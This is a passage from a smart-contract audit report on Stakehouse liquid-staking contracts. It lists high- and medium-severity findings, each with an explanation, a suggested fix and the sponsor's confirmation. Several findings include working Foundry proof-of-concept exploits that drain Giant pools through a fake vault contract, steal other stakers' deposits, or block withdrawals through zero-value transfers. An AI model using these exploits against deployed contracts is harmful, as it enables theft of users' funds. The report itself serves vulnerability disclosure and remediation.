When GiantMevAndFeesPool.claimRewards is called in GiantMevAndFeesPool.withdrawETH, the idleETH is reduced but the ETH is not yet sent to the user, which increases totalRewardsReceived and accumulatedETHPerLPShare, thus making the user receive more rewards when calling GiantMevAndFeesPool.claimRewards.

Proof of Concept

Change to

function withdrawETH(uint256 _amount) external nonReentrant {
    require(_amount >= MIN_STAKING_AMOUNT, "Invalid amount");
    require(lpTokenETH.balanceOf(msg.sender) >= _amount, "Invalid balance");
    require(idleETH >= _amount, "Come back later or withdraw less ETH");

-  idleETH -= _amount;

    lpTokenETH.burn(msg.sender, _amount);
+  idleETH -= _amount;

    (bool success,) ={value: _amount}("");
    require(success, "Failed to transfer ETH");

    emit LPBurnedForETH(msg.sender, _amount);

vince0656 (Stakehouse) confirmed

[H-17] Giant pools can be drained due to weak vault authenticity check

Submitted by Jeiwan, also found by Trust, datapunk, immeas, JTJabba, arcoun, bin2chen, imare, wait, unforgiven, satoshipotato, ronnyx2017, Lambda, hihen, bitbopper, fs0c, banky, 9svR6w, c7e7eff, perseverancesuccess, 0xdeadbeef0x, and clems4ever

An attacker can withdraw all ETH staked by users in a Giant pool. Both GiantSavETHVaultPool and GiantMevAndFeesPool are affected.

Proof of Concept

The batchDepositETHForStaking function in the Giant pools check whether a provided vault is authentic by validating its liquid staking manager contract and sends funds to the vault when the check passes (GiantSavETHVaultPool.sol#L48-L58):

SavETHVault savETHPool = SavETHVault(_savETHVaults[i]);
    "Invalid liquid staking manager"

// Deposit ETH for staking of BLS key
savETHPool.batchDepositETHForStaking{ value: transactionAmount }(

An attacker can pass an exploit contract as a vault. The exploit contract will implement liquidStakingManager that will return a valid staking manager contract address to trick a Giant pool into sending ETH to the exploit contract:

// test/foundry/GiantPools.t.sol
contract GiantPoolExploit {
    address immutable owner = msg.sender;
    address validStakingManager;

    constructor(address validStakingManager_) {
        validStakingManager = validStakingManager_;

    function liquidStakingManager() public view returns (address) {
        return validStakingManager;

    function batchDepositETHForStaking(bytes[] calldata /*_blsPublicKeyOfKnots*/, uint256[] calldata /*_amounts*/) external payable {

function testPoolDraining_AUDIT() public {
    // Register BLS key
    address nodeRunner = accountOne;, 12 ether);
    registerSingleBLSPubKey(nodeRunner, blsPubKeyOne, accountFour);

    // Set up users and ETH
    address savETHUser = accountThree;, 24 ether);

    address attacker = address(0x1337);
    vm.label(attacker, "attacker");, 1 ether);

    // User deposits ETH into Giant savETH
    giantSavETHPool.depositETH{value: 24 ether}(24 ether);
    assertEq(giantSavETHPool.lpTokenETH().balanceOf(savETHUser), 24 ether);
    assertEq(address(giantSavETHPool).balance, 24 ether);

    // Attacker deploys an exploit.
    GiantPoolExploit exploit = new GiantPoolExploit(address(manager));

    // Attacker calls `batchDepositETHForStaking` to deposit ETH to their exploit contract.
    bytes[][] memory blsKeysForVaults = new bytes[][](1);
    blsKeysForVaults[0] = getBytesArrayFromBytes(blsPubKeyOne);

    uint256[][] memory stakeAmountsForVaults = new uint256[][](1);
    stakeAmountsForVaults[0] = getUint256ArrayFromValues(24 ether);

        getUint256ArrayFromValues(24 ether),

    // Vault got nothing.
    assertEq(address(manager.savETHVault()).balance, 0 ether);
    // Attacker has stolen user's deposit.
    assertEq(attacker.balance, 25 ether);

Consider taking a list of LiquidStakingManager addresses instead of vault addresses:

--- a/contracts/liquid-staking/GiantSavETHVaultPool.sol
+++ b/contracts/liquid-staking/GiantSavETHVaultPool.sol
@@ -27,12 +28,12 @@ contract GiantSavETHVaultPool is StakehouseAPI, GiantPoolBase {
     /// @param _blsPublicKeys For every savETH vault, the list of BLS keys of LSDN validators receiving funding
     /// @param _stakeAmounts For every savETH vault, the amount of ETH each BLS key will receive in funding
     function batchDepositETHForStaking(
-        address[] calldata _savETHVaults,
+        address[] calldata _liquidStakingManagers,
         uint256[] calldata _ETHTransactionAmounts,
         bytes[][] calldata _blsPublicKeys,
         uint256[][] calldata _stakeAmounts
     ) public {
-        uint256 numOfSavETHVaults = _savETHVaults.length;
+        uint256 numOfSavETHVaults = _liquidStakingManagers.length;
         require(numOfSavETHVaults > 0, "Empty arrays");
         require(numOfSavETHVaults == _ETHTransactionAmounts.length, "Inconsistent array lengths");
         require(numOfSavETHVaults == _blsPublicKeys.length, "Inconsistent array lengths");
@@ -40,16 +41,18 @@ contract GiantSavETHVaultPool is StakehouseAPI, GiantPoolBase {

         // For every vault specified, supply ETH for at least 1 BLS public key of a LSDN validator
         for (uint256 i; i < numOfSavETHVaults; ++i) {
+            require(
+                liquidStakingDerivativeFactory.isLiquidStakingManager(_liquidStakingManagers[i]),
+                "Invalid liquid staking manager"
+            );
             uint256 transactionAmount = _ETHTransactionAmounts[i];

             // As ETH is being deployed to a savETH pool vault, it is no longer idle
             idleETH -= transactionAmount;

-            SavETHVault savETHPool = SavETHVault(_savETHVaults[i]);
-            require(
-                liquidStakingDerivativeFactory.isLiquidStakingManager(address(savETHPool.liquidStakingManager())),
-                "Invalid liquid staking manager"
-            );
+            LiquidStakingManager liquidStakingManager = LiquidStakingManager(payable(_liquidStakingManagers[i]));
+            SavETHVault savETHPool = liquidStakingManager.savETHVault();

             // Deposit ETH for staking of BLS key
             savETHPool.batchDepositETHForStaking{ value: transactionAmount }(

vince0656 (Stakehouse) confirmed

[H-18] Old stakers can steal deposits of new stakers in StakingFundsVault

Submitted by Jeiwan, also found by immeas, rbserver, unforgiven, cccz, and 9svR6w

Stakers to the MEV+fees vault can steal funds from the new stakers who staked after a validator was registered and the derivatives were minted. A single staker who staked 4 ETH can steal all funds deposited by new stakers.

Proof of Concept

StakingFundsVault is designed to pull rewards from a Syndicate contract and distributed them pro-rata among LP token holders (StakingFundsVault.sol#L215-L231):

if (i == 0 && !Syndicate(payable(liquidStakingNetworkManager.syndicate())).isNoLongerPartOfSyndicate(_blsPubKeys[i])) {
    // Withdraw any ETH accrued on free floating SLOT from syndicate to this contract
    // If a partial list of BLS keys that have free floating staked are supplied, then partial funds accrued will be fetched

    // Distribute ETH per LP

// If msg.sender has a balance for the LP token associated with the BLS key, then send them any accrued ETH
LPToken token = lpTokenForKnot[_blsPubKeys[i]];
require(address(token) != address(0), "Invalid BLS key");
require(token.lastInteractedTimestamp(msg.sender) + 30 minutes < block.timestamp, "Last transfer too recent");
_distributeETHRewardsToUserForToken(msg.sender, address(token), token.balanceOf(msg.sender), _recipient);

The updateAccumulatedETHPerLP function calculates the reward amount per LP token share (SyndicateRewardsProcessor.sol#L76):

function _updateAccumulatedETHPerLP(uint256 _numOfShares) internal {
    if (_numOfShares > 0) {
        uint256 received = totalRewardsReceived();
        uint256 unprocessed = received - totalETHSeen;

        if (unprocessed > 0) {
            emit ETHReceived(unprocessed);

            // accumulated ETH per minted share is scaled to avoid precision loss. it is scaled down later
            accumulatedETHPerLPShare += (unprocessed * PRECISION) / _numOfShares;

            totalETHSeen = received;

And the _distributeETHRewardsToUserForToken function distributes rewards to LP token holders (SyndicateRewardsProcessor.sol#L51):

function _distributeETHRewardsToUserForToken(
    address _user,
    address _token,
    uint256 _balance,
    address _recipient
) internal {
    require(_recipient != address(0), "Zero address");
    uint256 balance = _balance;
    if (balance > 0) {
        // Calculate how much ETH rewards the address is owed / due 
        uint256 due = ((accumulatedETHPerLPShare * balance) / PRECISION) - claimed[_user][_token];
        if (due > 0) {
            claimed[_user][_token] = due;

            totalClaimed += due;

            (bool success, ) ={value: due}("");
            require(success, "Failed to transfer");

            emit ETHDistributed(_user, _recipient, due);

To ensure that rewards are distributed fairly, these functions are called before LP token balances are updated (e.g. when making a deposit StakingFundsVault.sol#L123).

However, this rewards accounting algorithm also counts deposited tokens:

  1. to stake tokens, users call depositETHForStaking and send ETH (StakingFundsVault.sol#L113);
  2. updateAccumulatedETHPerLP is called in the function (StakingFundsVault.sol#L123);
  3. updateAccumulatedETHPerLP checks the balance of the contract, which already includes the new staked amount (SyndicateRewardsProcessor.sol#L78, SyndicateRewardsProcessor.sol#L94).
  4. the staked amount is then counted in the accumulatedETHPerLPShare variable (SyndicateRewardsProcessor.sol#L85), which is used to calculate the reward amount per LP share (SyndicateRewardsProcessor.sol#L61).

This allows the following attack:

  1. a user stakes 4 ETH to a BLS key;
  2. the validator with the BLS key gets registered and its derivative tokens get minted;
  3. a new user stakes some amount to a different BLS key;
  4. the first user calls claimRewards and withdraws the stake of the new user.
// test/foundry/StakingFundsVault.t.sol
function testStealingOfDepositsByOldStakers_AUDIT() public {
    // Resetting the mocks, we need real action.
    MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyOne, 0);
    MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyTwo, 0);
    liquidStakingManager.setIsPartOfNetwork(blsPubKeyOne, false);
    liquidStakingManager.setIsPartOfNetwork(blsPubKeyTwo, false);

    // Aliasing accounts for better readability.
    address nodeRunner = accountOne;
    address alice = accountTwo;
    address alice2 = accountFour;
    address bob = accountThree;

    // Node runner registers two BLS keys.
    registerSingleBLSPubKey(nodeRunner, blsPubKeyOne, accountFive);
    registerSingleBLSPubKey(nodeRunner, blsPubKeyTwo, accountFive);

    // Alice deposits to the MEV+fees vault of the first key.
    maxETHDeposit(alice, getBytesArrayFromBytes(blsPubKeyOne));

    // Someone else deposits to the savETH vault of the first key.
    liquidStakingManager.savETHVault().depositETHForStaking{value: 24 ether}(blsPubKeyOne, 24 ether);

    // The first validator is registered and the derivatives are minted.
    assertEq(vault.totalShares(), 0);
    assertEq(vault.totalShares(), 4 ether);

    // Warping to pass the lastInteractedTimestamp checks.
    vm.warp(block.timestamp + 1 hours);

    // The first key cannot accept new deposits since the maximal amount was deposited
    // and the validator was register. The vault however can still be used to deposit to
    // other keys.

    // Bob deposits to the MEV+fees vault of the second key.
    maxETHDeposit(bob, getBytesArrayFromBytes(blsPubKeyTwo));
    assertEq(address(vault).balance, 4 ether);
    assertEq(bob.balance, 0);

    // Alice is claiming rewards for the first key.
    // Notice that no rewards were distributed to the MEV+fees vault of the first key.
    assertEq(alice2.balance, 0);
    vault.claimRewards(alice2, getBytesArrayFromBytes(blsPubKeyOne));

    LPToken lpTokenBLSPubKeyOne = vault.lpTokenForKnot(blsPubKeyOne);

    // Alice has stolen the Bob's deposit.
    assertEq(alice2.balance, 4 ether);
    assertEq(vault.claimed(alice, address(lpTokenBLSPubKeyOne)), 4 ether);
    assertEq(vault.claimed(alice2, address(lpTokenBLSPubKeyOne)), 0);

    assertEq(address(vault).balance, 0);
    assertEq(bob.balance, 0);

Consider excluding newly staked amounts in the accumulatedETHPerLPShare calculations.

vince0656 (Stakehouse) confirmed duplicate issue #375

[H-19] withdrawETH() in GiantPoolBase don’t call _distributeETHRewardsToUserForToken() or _onWithdraw() which would make users to lose their remaining rewards

Submitted by unforgiven, also found by 0x4non

Function _distributeETHRewardsToUserForToken() is used to distribute remaining reward of user and it’s called in _onWithdraw() of GiantMevAndFeesPool. but function withdrawETH() in GiantPoolBase don’t call either of them and burn user giant LP token balance so if user withdraw his funds and has some remaining ETH rewards he would lose those rewards because his balance set to zero.

Proof of Concept

This is withdrawETH() code in GiantPoolBase:

    /// @notice Allow a user to chose to burn their LP tokens for ETH only if the requested amount is idle and available from the contract
    /// @param _amount of LP tokens user is burning in exchange for same amount of ETH
    function withdrawETH(uint256 _amount) external nonReentrant {
        require(_amount >= MIN_STAKING_AMOUNT, "Invalid amount");
        require(lpTokenETH.balanceOf(msg.sender) >= _amount, "Invalid balance");
        require(idleETH >= _amount, "Come back later or withdraw less ETH");

        idleETH -= _amount;

        lpTokenETH.burn(msg.sender, _amount);
        (bool success,) ={value: _amount}("");
        require(success, "Failed to transfer ETH");

        emit LPBurnedForETH(msg.sender, _amount);

As you can see it burn user lpTokenETH balance and don’t call either _distributeETHRewardsToUserForToken() or _onWithdraw(). and in function claimRewards() uses lpTokenETH.balanceOf(msg.sender) to calculate user rewards so if user balance get to 0 user won’t get the remaining rewards. These are steps that this bug happens:

  1. user1 deposit 10 ETH into the giant pool and claimed[user1][lpTokenETH] is 20 and accumulatedETHPerLPShare is 2.
  2. some time passes and accumulatedETHPerLPShare set to 3.
  3. user1 unclaimed rewards are 10 * 3 - 20 = 10 ETH.
  4. user1 withdraw his 10 ETH by calling withdrawETH(10) and contract set lpTokenETH balance of user1 to 0 and transfer 10 ETH to user.
  5. now if user1 calls claimRewards() he would get 0 reward as his lpTokenETH balance is 0.

so users lose their unclaimed rewards by withdrawing their funds.

Tools Used


User’s unclaimed funds should be calculated and transferred before any actions that change user’s balance.

vince0656 (Stakehouse) confirmed

[H-20] Possibly reentrancy attacks in _distributeETHRewardsToUserForToken function

Submitted by rotcivegaf, also found by datapunk, 0x4non, and clems4ever

The root of the problem is in the _distributeETHRewardsToUserForToken which makes a call to distribute the ether rewards. With this call, the recipient can execute an reentrancy attack calling several times the different function to steal founds or take advantage of other users/protocol.

Proof of Concept

This functions use the _distributeETHRewardsToUserForToken:

beforeTokenTransfer, GiantMevAndFeesPool contract:

The contract GiantLP use the GiantMevAndFeesPool contract as transferHookProcessor and when use the functions _mint, _burn, transferFrom and transfer of the ERC20, the function beforeTokenTransfer implemented in the GiantMevAndFeesPool bring a possibility to make a reentrancy attack because in the function _distributeETHRewardsToUserForToken implemented in the GiantMevAndFeesPool make a call to the _recipient

A contract can call the function transfer of GiantLP contract several time, transfer an amount from and to self, as the update of the claimed would not be done until, it is executed the function _afterTokenTransfer of the GiantLP contract, the due amount calculated in _distributeETHRewardsToUserForToken of SyndicateRewardsProcessor contract and the lastInteractedTimestamp of GiantLP contract will be incorrect

withdrawLPTokens, GiantPoolBase contract:

The possibility of the reentrancy is given when call function _onWithdraw, this function implemented in GiantMevAndFeesPool contract uses _distributeETHRewardsToUserForToken and this one call the recipient making the possibility of the reentrancy, breaking the code of L76-L89

batchDepositETHForStaking, StakingFundsVault contract:

The possibility of the reentrancy is given when call function _distributeETHRewardsToUserForToken, this function call the recipient making the possibility of the reentrancy, breaking the code of L76-L89

depositETHForStaking, StakingFundsVault contract:

The possibility of the reentrancy is given when call function _distributeETHRewardsToUserForToken, this function call the recipient making the possibility of the reentrancy, breaking the code of L136-L142

beforeTokenTransfer, StakingFundsVault contract:

The possibility of the reentrancy is given when call function _distributeETHRewardsToUserForToken in L333 and L337, this function call the recipient making the possibility of the reentrancy, breaking the code of L343-L351

One possibility is to wrap(deposit) ether in WETH and transfer as ERC20 token.

Another is to add nonReentrant guard to the functions:

File: contracts/liquid-staking/GiantMevAndFeesPool.sol

@@ -143,7 +143,7 @@ contract GiantMevAndFeesPool is ITransferHookProcessor, GiantPoolBase, Syndicate

     /// @notice Allow giant LP token to notify pool about transfers so the claimed amounts can be processed
-    function beforeTokenTransfer(address _from, address _to, uint256) external {
+    function beforeTokenTransfer(address _from, address _to, uint256) external nonReentrant {
         require(msg.sender == address(lpTokenETH), "Caller is not giant LP");
File: contracts/liquid-staking/GiantPoolBase.sol

@@ -66,7 +66,7 @@ contract GiantPoolBase is ReentrancyGuard {
     /// @notice Allow a user to chose to withdraw vault LP tokens by burning their giant LP tokens. 1 Giant LP == 1 vault LP
     /// @param _lpTokens List of LP tokens being owned and being withdrawn from the giant pool
     /// @param _amounts List of amounts of giant LP being burnt in exchange for vault LP
-    function withdrawLPTokens(LPToken[] calldata _lpTokens, uint256[] calldata _amounts) external {
+    function withdrawLPTokens(LPToken[] calldata _lpTokens, uint256[] calldata _amounts) external nonReentrant {
         uint256 amountOfTokens = _lpTokens.length;
         require(amountOfTokens > 0, "Empty arrays");
         require(amountOfTokens == _amounts.length, "Inconsistent array lengths");
File: contracts/liquid-staking/StakingFundsVault.sol

@@ -66,7 +66,7 @@ contract StakingFundsVault is
     /// @notice Batch deposit ETH for staking against multiple BLS public keys
     /// @param _blsPublicKeyOfKnots List of BLS public keys being staked
     /// @param _amounts Amounts of ETH being staked for each BLS public key
-    function batchDepositETHForStaking(bytes[] calldata _blsPublicKeyOfKnots, uint256[] calldata _amounts) external payable {
+    function batchDepositETHForStaking(bytes[] calldata _blsPublicKeyOfKnots, uint256[] calldata _amounts) external payable nonReentrant {
         uint256 numOfValidators = _blsPublicKeyOfKnots.length;
         require(numOfValidators > 0, "Empty arrays");
         require(numOfValidators == _amounts.length, "Inconsistent array lengths");

@@ -110,7 +110,7 @@ contract StakingFundsVault is
     /// @notice Deposit ETH against a BLS public key for staking
     /// @param _blsPublicKeyOfKnot BLS public key of validator registered by a node runner
     /// @param _amount Amount of ETH being staked
-    function depositETHForStaking(bytes calldata _blsPublicKeyOfKnot, uint256 _amount) public payable returns (uint256) {
+    function depositETHForStaking(bytes calldata _blsPublicKeyOfKnot, uint256 _amount) public payable nonReentrant returns (uint256) {
         require(liquidStakingNetworkManager.isBLSPublicKeyBanned(_blsPublicKeyOfKnot) == false, "BLS public key is banned or not a part of LSD network");
             getAccountManager().blsPublicKeyToLifecycleStatus(_blsPublicKeyOfKnot) == IDataStructures.LifecycleStatus.INITIALS_REGISTERED,

@@ -312,7 +312,7 @@ contract StakingFundsVault is

     /// @notice before an LP token is transferred, pay the user any unclaimed ETH rewards
-    function beforeTokenTransfer(address _from, address _to, uint256) external override {
+    function beforeTokenTransfer(address _from, address _to, uint256) external override nonReentrant {
         address syndicate = liquidStakingNetworkManager.syndicate();
         if (syndicate != address(0)) {
             LPToken token = LPToken(msg.sender);

vince0656 (Stakehouse) confirmed

[H-21] bringUnusedETHBackIntoGiantPool in GiantMevAndFeesPool can be used to steal LPTokens

Submitted by datapunk

real LPTokens can be transferred out of GiantMevAndFeesPool through fake _stakingFundsVaults provided by an attacker.

Proof of Concept

bringUnusedETHBackIntoGiantPool takes in _stakingFundsVaults, _oldLPTokens, _newLPTokens and rotate _amounts from old to new tokens. The tokens are thoroughly verified by burnLPForETH in ETHPoolLPFactory.
However, theres is no checking for the validity of _stakingFundsVaults, nor the relationship between LPTokens and _stakingFundsVaults. Therefore, an attacker can create fake contracts for _stakingFundsVaults, with burnLPTokensForETH, that takes LPTokens as parameters. The msg.sender in burnLPTokensForETH is GiantMevAndFeesPool, thus the attacker can transfer LPTokens that belongs to GiantMevAndFeesPool to any addresses it controls.

Always passing liquid staking manager address, checking its real and then requesting either the savETH vault or staking funds vault is a good idea to prove the validity of vaults.

vince0656 (Stakehouse) confirmed

Medium Risk Findings (31)

[M-01] Freezing of funds - Hacker can prevent users withdraws in giant pools

Submitted by 0xdeadbeef0x, also found by Trust, JTJabba, joestakey, V_B, minhtrng, unforgiven, Jeiwan, hihen, Lambda, aphak5010, and HE1M


A hacker can prevent users from withdrawing dETH or LPTokens in giant pools.

This bug causes a revert in:

  1. WithdrawLP - GiantMevAndFeesPool
  2. WithdrawLP - GiantSavETHVaultPool
  3. WithdrawDETH - GiantSavETHVaultPool

A hacker can prevent a user from receiving dETH when users are eligible and guaranteed to receive it through their stake.

This causes a liquidity crunch as the only funds that are possible to withdraw are ETH. There is not enough ETH in the giant pools to facilitate a large withdraw as ETH is staked for LPTokens and dETH.

The giant pools will become insolvent to returning ETH, dETH or vault LPTokens.

Proof of Concept

Both WithdrawLP and WithdrawDETH act in a similar way:

  1. loop LPtokens received for withdraw
  2. Check user has enough Giant LP tokens to burn and pool has enough vault LP to give.
  3. Check that a day has passed since user has interacted with Giant LP Token
  4. burn tokens
  5. send tokens

Example of WithdrawDETH:

    function withdrawDETH(
        address[] calldata _savETHVaults,
        LPToken[][] calldata _lpTokens,
        uint256[][] calldata _amounts
    ) external {
        uint256 numOfVaults = _savETHVaults.length;
        require(numOfVaults > 0, "Empty arrays");
        require(numOfVaults == _lpTokens.length, "Inconsistent arrays");
        require(numOfVaults == _amounts.length, "Inconsistent arrays");

        // Firstly capture current dETH balance and see how much has been deposited after the loop
        uint256 dETHReceivedFromAllSavETHVaults = getDETH().balanceOf(address(this));
        for (uint256 i; i < numOfVaults; ++i) {
            SavETHVault vault = SavETHVault(_savETHVaults[i]);

            // Simultaneously check the status of LP tokens held by the vault and the giant LP balance of the user
            for (uint256 j; j < _lpTokens[i].length; ++j) {
                LPToken token = _lpTokens[i][j];
                uint256 amount = _amounts[i][j];

                // Check the user has enough giant LP to burn and that the pool has enough savETH vault LP
                _assertUserHasEnoughGiantLPToClaimVaultLP(token, amount);

                require(vault.isDETHReadyForWithdrawal(address(token)), "dETH is not ready for withdrawal");

                // Giant LP is burned 1:1 with LPs from sub-networks
                require(lpTokenETH.balanceOf(msg.sender) >= amount, "User does not own enough LP");

                // Burn giant LP from user before sending them dETH
                lpTokenETH.burn(msg.sender, amount);

                emit LPBurnedForDETH(address(token), msg.sender, amount);

            // Ask
            vault.burnLPTokens(_lpTokens[i], _amounts[i]);

        // Calculate how much dETH has been received from burning
        dETHReceivedFromAllSavETHVaults = getDETH().balanceOf(address(this)) - dETHReceivedFromAllSavETHVaults;

        // Send giant LP holder dETH owed
        getDETH().transfer(msg.sender, dETHReceivedFromAllSavETHVaults);

The bug is in _assertUserHasEnoughGiantLPToClaimVaultLP in the last require that checks that a day has passed since the user has interacted with Giant LP Token:

    function _assertUserHasEnoughGiantLPToClaimVaultLP(LPToken _token, uint256 _amount) internal view {
        require(_amount >= MIN_STAKING_AMOUNT, "Invalid amount");
        require(_token.balanceOf(address(this)) >= _amount, "Pool does not own specified LP");
        require(lpTokenETH.lastInteractedTimestamp(msg.sender) + 1 days < block.timestamp, "Too new");

The condition lpTokenETH.lastInteractedTimestamp(msg.sender) + 1 days < block.timestamp can be set to fail by the hacker. The hacker transfers 0 lpTokenETH tokens to msg.sender. This transfer will update the lastInteractedTimestamp to now.

The above can be done once a day or on-demand by front-running the withdraw commands.

_afterTokenTransfer in GiantLP.sol:

    function _afterTokenTransfer(address _from, address _to, uint256 _amount) internal override {
        lastInteractedTimestamp[_from] = block.timestamp;
        lastInteractedTimestamp[_to] = block.timestamp;
        if (address(transferHookProcessor) != address(0)) ITransferHookProcessor(transferHookProcessor).afterTokenTransfer(_from, _to, _amount);

Foundry POC

The POC will show how a hacker prevents a user from receiving dETH although they are eligible to receive it.

Add the following test to GiantPools.t.sol:

    function testPreventWithdraw() public {
        // Set up users and ETH
        address nodeRunner = accountOne;, 12 ether);
        address feesAndMevUserOne = accountTwo;, 4 ether);
        address savETHUser = accountThree;, 24 ether);

        // Register BLS key
        registerSingleBLSPubKey(nodeRunner, blsPubKeyOne, accountFour);

        // Deposit 24 ETH into giant savETH
        giantSavETHPool.depositETH{value: 24 ether}(24 ether);
        assertEq(giantSavETHPool.lpTokenETH().balanceOf(savETHUser), 24 ether);
        assertEq(address(giantSavETHPool).balance, 24 ether);

        // Deploy 24 ETH from giant LP into savETH pool of LSDN instance
        bytes[][] memory blsKeysForVaults = new bytes[][](1);
        blsKeysForVaults[0] = getBytesArrayFromBytes(blsPubKeyOne);

        uint256[][] memory stakeAmountsForVaults = new uint256[][](1);
        stakeAmountsForVaults[0] = getUint256ArrayFromValues(24 ether);

            getUint256ArrayFromValues(24 ether),
        assertEq(address(manager.savETHVault()).balance, 24 ether);

        // Deposit 4 ETH into giant fees and mev
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);

        assertEq(address(giantFeesAndMevPool).balance, 4 ether);
        stakeAmountsForVaults[0] = getUint256ArrayFromValues(4 ether);
            getUint256ArrayFromValues(4 ether),

        // Ensure we can stake and mint derivatives

        IERC20 dETHToken = savETHVault.dETHToken();

        dETHToken.transfer(address(savETHVault.saveETHRegistry()), 24 ether);

        LPToken[] memory tokens = new LPToken[](1);
        tokens[0] = savETHVault.lpTokenForKnot(blsPubKeyOne);

        LPToken[][] memory allTokens = new LPToken[][](1);
        allTokens[0] = tokens;

        stakeAmountsForVaults[0] = getUint256ArrayFromValues(24 ether);

        // User will not have any dETH to start
        assertEq(dETHToken.balanceOf(savETHUser), 0);

        // Warp ahead -> savETHUser eligible to dETH
        vm.warp(block.timestamp + 2 days);

        // Send 0 tokens to savETHUser so he cannot withdrawDETH
        address hacker = address(0xdeadbeef);
        giantSavETHPool.lpTokenETH().transfer(savETHUser, 0);
        address[] memory addresses = getAddressArrayFromValues(address(manager.savETHVault()));

        // Validate withdrawDETH will revert  
        vm.expectRevert("Too new");
        giantSavETHPool.withdrawDETH(addresses, allTokens, stakeAmountsForVaults);

To run the POC execute: yarn test -m "PreventWithdraw" -v

Expected output:

Running 1 test for test/foundry/GiantPools.t.sol:GiantPoolTests
[PASS] testPreventWithdraw() (gas: 3132637)
Test result: ok. 1 passed; 0 failed; finished in 9.25ms

To run with full trace, execute: yarn test -m "PreventWithdraw" -vvvv

Tools Used

VS Code, Foundry

Make sure transfers in the GiantLP are only for funds larger than (0.001 ETH), this will make the exploitation expensive.

vince0656 (Stakehouse) confirmed

[M-02] Rotating LPTokens to banned BLS public key

Submitted by HE1M

It is possible to rotate LPTokens to a banned BLS public key. This is not a safe action, because it can result in insolvency of the project (specially if the banned BLS public key was malicious).

Proof of Concept

When a user deposits ETH for staking by calling depositETHForStaking, the manager checks whether the provided BLS public key is banned or not.
require(liquidStakingNetworkManager.isBLSPublicKeyBanned(_blsPublicKeyOfKnot) == false, "BLS public key is banned or not a part of LSD network");

If it is not banned the LPToken related to that BLS public key will be minted to the caller, so the number of LPToken related to that BLS public key will be increased.

If it is banned, it will not be possible to stake to this BLS public key, so the number of LPToken will not be increased. But the issue is that it is still possible to increase the LPToken of this BLS public key through rotating LPToken.

In other words, a malicious user can call rotateLPTokens, so that the _oldLPToken will be migrated to _newLPToken which is equal to the LPToken related to the banned BLS public key.

In summary, the vulnerability is that during rorating LPTokens, it is not checked that the _newLPToken is related to a banned BLS public key or not.

The following line should be added to function rotateLPTokens(...):
require(liquidStakingNetworkManager.isBLSPublicKeyBanned(blsPublicKeyOfNewKnot ) == false, "BLS public key is banned or not a part of LSD network");

vince0656 (Stakehouse) confirmed

[M-03] Giant pools cannot receive ETH from vaults

Submitted by 0xdeadbeef0x, also found by datapunk, bin2chen, hihen, and koxuan

Both giant pools are affected:

  1. GiantSavETHVaultPool
  2. bringUnusedETHBackIntoGiantPool

The giant pools have a bringUnusedETHBackIntoGiantPool function that calls the vaults to send back any unused ETH. Currently, any call to this function will revert.
Unused ETH will not be sent to the giant pools and will stay in the vaults.

This causes an insolvency issue when many users want to withdraw ETH and there is not enough liquidity inside the giant pools.

Proof of Concept

bringUnusedETHBackIntoGiantPool calls the vaults to receive ETH:

    function bringUnusedETHBackIntoGiantPool(
        address[] calldata _savETHVaults,
        LPToken[][] calldata _lpTokens,
        uint256[][] calldata _amounts
    ) external {
        uint256 numOfVaults = _savETHVaults.length;
        require(numOfVaults > 0, "Empty arrays");
        require(numOfVaults == _lpTokens.length, "Inconsistent arrays");
        require(numOfVaults == _amounts.length, "Inconsistent arrays");
        for (uint256 i; i < numOfVaults; ++i) {
            SavETHVault vault = SavETHVault(_savETHVaults[i]);
            for (uint256 j; j < _lpTokens[i].length; ++j) {
                    vault.isDETHReadyForWithdrawal(address(_lpTokens[i][j])) == false,
                    "ETH is either staked or derivatives minted"
            vault.burnLPTokens(_lpTokens[i], _amounts[i]);

the vaults go through a process of burning the _lpTokens and sending the caller giant pool ETH.


    function burnLPToken(LPToken _lpToken, uint256 _amount) public nonReentrant returns (uint256) {
        /// .....
        (bool result,) ={value: _amount}("");
        // .....

Giant pools do not have a fallback or receive function. ETH cannot be sent to them

Additionally, there is no accounting of idleETH, which should be increased with the received ETH in order to facilitate withdraws

Tools Used

VS Code

  1. Add a fallback or receive function to the pools.
  2. idleETH should be increased with the received ETH

vince0656 (Stakehouse) confirmed

[M-04] GiantPool should not check ETH amount on withdrawal

Submitted by aphak5010, also found by Trust, Jeiwan, yixxas, and HE1M

The GiantPoolBase.withdrawETH function requires that the amount to withdraw is at least as big as the MIN_STAKING_AMOUNT (

This check does not serve any purpose and can actually cause the user problems when withdrawing his ETH.

Proof of Concept

  1. Bob deposits ETH into the GiantPool with the GiantPoolBase.depositETH function.
    The amount is equal to MIN_STAKING_AMOUNT + 0.99 * MIN_STAKING_AMOUNT.
  2. Bob witdraws MIN_STAKING_AMOUNT ETH from the GiantPool.
  3. Bob has 0.99 * MIN_STAKING_AMOUNT ETH left in the GiantPool. This is a problem since he cannot withdraw this amount of ETH since it is smaller than MIN_STAKING_AMOUNT.
    In order to withdraw his funds, Bob needs to first add funds to the GiantPool such that the deposited amount is big enough for withdrawal. However this causes extra transaction fees to be paid (loss of funds) and causes a bad user experience.

Tools Used


The require(_amount >= MIN_STAKING_AMOUNT, "Invalid amount"); statement should just be removed. It does not serve any purpose anyway.

vince0656 (Stakehouse) confirmed

[M-05] Adding non EOA representative

Submitted by HE1M, also found by joestakey, SmartSek, Jeiwan, and yixxas

It is not allowed to add non-EOA representative to the smart wallet.
But, this limitation can be bypassed by rotating representatives.

Proof of Concept

During registering a node runner to LSD by creating a new smart wallet, it is checked that the _eoaRepresentative is an EOA or not.

require(!Address.isContract(_eoaRepresentative), "Only EOA representative permitted");

But this check is missing during rotating EOA representative in two functions rotateEOARepresentative and rotateEOARepresentativeOfNodeRunner.

In other words _newRepresentative can be a contract in these two functions without being prevented. So, this can bypass the check during registering a node runner to LSD.

The following line should be added to functions rotateEOARepresentative and rotateEOARepresentativeOfNodeRunner:

require(!Address.isContract(_newRepresentative), "Only EOA representative permitted");

vince0656 (Stakehouse) confirmed duplicate issue #187

[M-06] Withdrawing wrong LPToken from GiantPool leads to loss of funds

Submitted by aphak5010, also found by datapunk, arcoun, wait, unforgiven, and yixxas

The GiantPoolBase.withdrawLPTokens function ( allows to withdraw LP tokens from a GiantPool by burning an equal amount of GiantLP.

This allows a user to handle the LP tokens directly without the need for a GiantPool as intermediary.

It is not checked however whether the LP tokens to be withdrawn were transferred to the GiantPool in exchange for staking ETH.

I.e. whether the LP token are of any value.

There are two issues associated with this behavior.

